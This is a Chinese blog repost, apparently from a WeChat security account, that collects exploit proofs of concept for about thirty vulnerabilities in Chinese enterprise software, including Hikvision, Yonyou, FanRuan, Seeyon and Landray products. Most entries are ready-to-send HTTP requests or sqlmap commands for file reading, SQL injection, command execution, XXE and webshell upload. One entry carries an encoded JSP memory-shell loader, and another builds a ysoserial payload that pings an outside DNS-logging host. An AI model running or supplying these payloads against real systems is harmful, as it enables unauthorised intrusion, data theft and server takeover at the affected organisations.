一、启明星辰-天清汉马VPN接口download任意文件读取
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9Connection: keep-aliveCookie: VSG_VERIFYCODE_CONF=0-0; VSG_CLIENT_RUNNING=false; VSG_LANGUAGE=zh_CN; VSG_CSRFTOKEN=1ec96cd6acc254fcf9e9cd6d1e85cf23Host:Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
二、启明星辰 天玥网络安全审计系统 SQL 注入漏洞
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl三、蓝凌EKP存在sys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.doHTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Length:401Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51Origin:http://www.baidu.comUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequest------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--
四、赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: close
五、赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Connection: close
六、数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
七、浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞
/cwbase/gsp/webservice/bizintegrationwebservice.asmx/cwbase/service/rps/xtdysrv.asmx
八、AnalyticsCloud 分析云存在任意文件读取漏洞
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
九、帆软未授权命令执行RCE
GET /webroot/decision/view/ReportServer?test=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1host: xxxxconnection: closecontent-type: application/x-www-form-urlencodedx-forwarded-for: xxxxaccept-encoding: gzip, deflateuser-agent: python-requests/2.31.0accept: */*
十、海康威视综合安防管理平台 前台RCE
POST /center/api/installation/detection HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/json;charset=UTF-8{"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)"}}
十一、SuiteCRM responseEntryPoint存在SQL注入漏洞
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1Host:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36: gzip, deflateAccept: */*Connection: keep-alive
十二、亿赛通数据泄露防护(DLP)系统NetSecConfigAjax接口存在SQL注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedcommand=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
十三、亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞
POST /CDGServer3/NoticeAjax;Service HTTP/1.1Host:Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Priority: u=0, iConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 98command=delNotice¬iceId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
十四、用友U8 Cloud MonitorServlet 存在反序列化漏洞
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.serPOST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36payload
十五、用友NC系统blobRefClassSearch接口中pk_org参数的sql注入漏洞
poc暂未公布。
十六、用友NC querygoodsgridbycode存在SQL注入漏洞
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1Host:Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Pragma: no-cacheAccept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cache-Control: no-cache
十七、通天星CMSV6车载定位监控平台disable存在SQL注入
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
十八、通天星主动安全监控云平台远程代码执行漏洞
poc暂未公布。
十九、润乾报表InputServlet存在任意文件上传漏洞
POST /Inputservlet?action=12 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/53736(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Content-Type: multipart/form-data; boundary=00contentOboundary00Host:Accept:text/html,image/gif,image/jpeg,*;q=.2,*/*;q=.2content-Length:241connection:close--00contentoboundary00Content-Disposition:form-data;name="upsize"1024--00contentoboundary00Content-Disposition: form-data; name="file"; filename="/..\..\..2211.jsp"Content-Type:image/jpeg123--00contentaboundary00--
二十、天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
二十一、 致远 OA fileUpload.do 前台文件上传绕过漏洞
1、上传图片马,返回 fileid 值
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)Content-Length: 754--00content0boundary00Content-Disposition: form-data; name="type"--00content0boundary00Content-Disposition: form-data; name="extensions"png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"--00content0boundary00Content-Disposition: form-data; name="destDirectory"--00content0boundary00Content-Disposition: form-data; name="destFilename"--00content0boundary00Content-Disposition: form-data; name="maxSize"--00content0boundary00Content-Disposition: form-data; name="isEncrypt"false--00content0boundary00Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf<% out.println("hello");%>--00content0boundary00--
2、修改文件后缀为 jsp
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)Content-Length: 64method=uploadMenuIcon&fileid=ID 值&filename=qwe.jsp
二十二、福建科立讯通信 指挥调度平台invite_one_member存在远程命令执行漏洞
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
二十三、福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞
POST /app/ext/ajax_users.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 infoContent-Type: application/x-www-form-urlencodeddep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
二十四、福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞
/app/ext/ajax_users.php二十五、锐捷 RG-NBS2026G-P交换机WEB 管理ping.htm未授权访问漏洞
/safety/ping.htm二十六、万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞
python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs二十七、云课网校系统uploadImage存在任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1Host: xx.xx.xx.xxAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip,deflate,brAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9mx-requested-with: XMLHttpRequest------WebKitFormBoundaryLZbmKeasWgo2gPtUContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/gif<?php phpinfo();?>------WebKitFormBoundaryLZbmKeasWgo2gPtU--
二十八、H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180)
poc暂未公布。
二十九、网传天擎0day rce
poc暂未公布。
三十、广联达Linkworks ArchiveWebService XML实体注入漏洞
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx"><archiveInfo><!DOCTYPE Archive [
    <!ENTITY secret SYSTEM "file:///windows/win.ini">
]>

<Archive>  
    <ArchiveInfo>  
        <UploaderID>
############


&secret;


##############
</UploaderID>  
    </ArchiveInfo>  
    <Result>  
        <MainDoc>Document Content</MainDoc>  
    </Result>  
    <DocInfo>  
        <DocTypeID>1</DocTypeID>  
        <DocVersion>1.0</DocVersion>  
    </DocInfo>  
</Archive></archiveInfo><folderIdList>string</folderIdList><platId>string</platId></PostArchiveInfo></soap:Body></soap:Envelope>
三十一、用U8 Cloud ActionServlet SQL注入漏洞
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzipConnection: close
三十二、用友U8 CRM import.php 文件上传漏洞
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5------WebKitFormBoundarye0z8QbHs79gL8vW5Content-Disposition: form-data; name="xfile"; filename="1.xls"------WebKitFormBoundarye0z8QbHs79gL8vW5Content-Disposition: form-data; name="combo"rce.php------WebKitFormBoundarye0z8QbHs79gL8vW5--
原文始发于微信公众号(实战安全研究):【0day/1day】2024HW合集附poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论